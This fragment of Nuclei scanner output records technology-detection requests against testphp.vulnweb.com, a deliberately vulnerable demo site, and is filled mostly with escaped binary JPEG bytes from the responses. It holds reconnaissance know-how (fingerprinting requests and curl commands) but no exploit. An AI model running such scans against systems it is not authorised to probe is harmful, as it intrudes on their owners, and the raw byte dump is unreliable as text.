d\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:35:00.6637549Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6,2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:35:01 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\u